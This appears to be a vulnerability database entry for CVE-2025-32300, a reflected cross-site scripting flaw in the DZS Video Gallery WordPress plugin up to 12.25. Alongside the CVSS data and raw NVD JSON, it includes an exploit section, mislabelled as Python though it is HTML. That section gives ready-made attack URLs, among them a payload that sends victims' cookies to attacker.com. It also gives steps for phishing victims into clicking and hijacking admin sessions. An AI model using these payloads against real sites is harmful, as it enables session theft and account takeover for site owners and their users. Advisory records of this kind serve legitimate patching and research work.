Security Vulnerability Report
中文
CVE-2025-32300 CVSS 7.1 HIGH

CVE-2025-32300

Published: 2026-01-07 12:17:02
Last Modified: 2026-04-28 19:31:37

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Digital zoom studio DZS Video Gallery allows Reflected XSS.This issue affects DZS Video Gallery: from n/a through 12.25.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

DZS Video Gallery <= 12.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-32300 PoC - Reflected XSS in DZS Video Gallery --> <!-- Target: WordPress DZS Video Gallery Plugin <= 12.25 --> <!DOCTYPE html> <html> <head> <title>CVE-2025-32300 PoC</title> </head> <body> <h1>CVE-2025-32300 - DZS Video Gallery Reflected XSS</h1> <h2>Attack URL:</h2> <p>Replace YOUR_TARGET with the vulnerable website URL</p> <textarea id="poc-url" rows="3" cols="100"> https://YOUR_TARGET/wp-content/plugins/dzs-videogallery/player.php?ajax=true&action=dzs_vp_insert_shortcode&type=video&source=<script>alert('XSS - CVE-2025-32300')</script> </textarea> <br><br> <h2>Cookie Stealing PoC:</h2> <textarea id="steal-cookie" rows="3" cols="100"> https://YOUR_TARGET/wp-content/plugins/dzs-videogallery/player.php?ajax=true&action=dzs_vp_insert_shortcode&type=video&source=<script>document.location='https://attacker.com/steal.php?c='+document.cookie</script> </textarea> <br><br> <h2>Usage:</h2> <ol> <li>Replace YOUR_TARGET with the actual website URL</li> <li>Send the crafted URL to the victim</li> <li>When victim clicks the link, XSS payload executes</li> </ol> <h2>Real-world Attack Scenario:</h2> <p>1. Attacker identifies WordPress site using DZS Video Gallery <= 12.25</p> <p>2. Attacker crafts malicious URL with XSS payload</p> <p>3. Attacker sends phishing email or embeds link on high-traffic site</p> <p>4. Victim clicks link, payload executes in their browser</p> <p>5. Attacker steals session cookies and hijacks admin account</p> <script> // Test if target is vulnerable function testVulnerability() { const url = document.getElementById('poc-url').value; console.log('Testing URL:', url); // In real scenario, use fetch() to test and analyze response alert('This is a PoC template. Test responsibly and only on systems you have permission to test.'); } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-32300", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:02.130", "lastModified": "2026-04-28T19:31:36.917", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Digital zoom studio DZS Video Gallery allows Reflected XSS.This issue affects DZS Video Gallery: from n/a through 12.25."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/dzs-videogallery/vulnerability/wordpress-dzs-video-gallery-plugin-12-25-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}